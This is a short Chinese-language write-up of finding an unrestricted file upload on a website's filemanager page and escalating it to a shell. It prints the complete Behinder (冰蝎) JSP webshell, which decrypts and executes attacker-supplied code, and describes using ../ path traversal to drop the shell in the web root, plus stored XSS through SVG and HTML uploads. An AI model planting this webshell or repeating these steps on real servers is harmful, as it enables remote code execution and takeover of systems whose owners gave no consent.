任意文件上传漏洞挖掘(getshell)

任意文件上传漏洞挖掘(getshell)

1.在漏洞挖掘过程中进行找到该子域名页面，

2.没有内容就扫目录，成功发现filemanager/，点击访问

看到upload页面感觉有惊喜，

果然有上传功能，点击上传抓包，经测试发现普通jsp会被拦截，蚁剑连不上，所以选择冰蝎马上传，因为冰蝎马默认AES加密

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*" %>
<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }

        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
%><%
    if (request.getMethod().equals("POST")) {
        String k = "e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/
        session.putValue("u", k);
        Cipher c = Cipher.getInstance("AES");
        c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
        new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);
    }
%>

但是没有路径回显，看到path,于是尝试…/上传

可以看到有路径，在尝试…/…/后

访问后发现正好是网站根路径

直接尝试冰蝎连接，连接成功

至此，成功gethell

当然也可以上传svg,html文件形成存储型XSS，经测试都是可以的，这里完全对上传文件没有限制。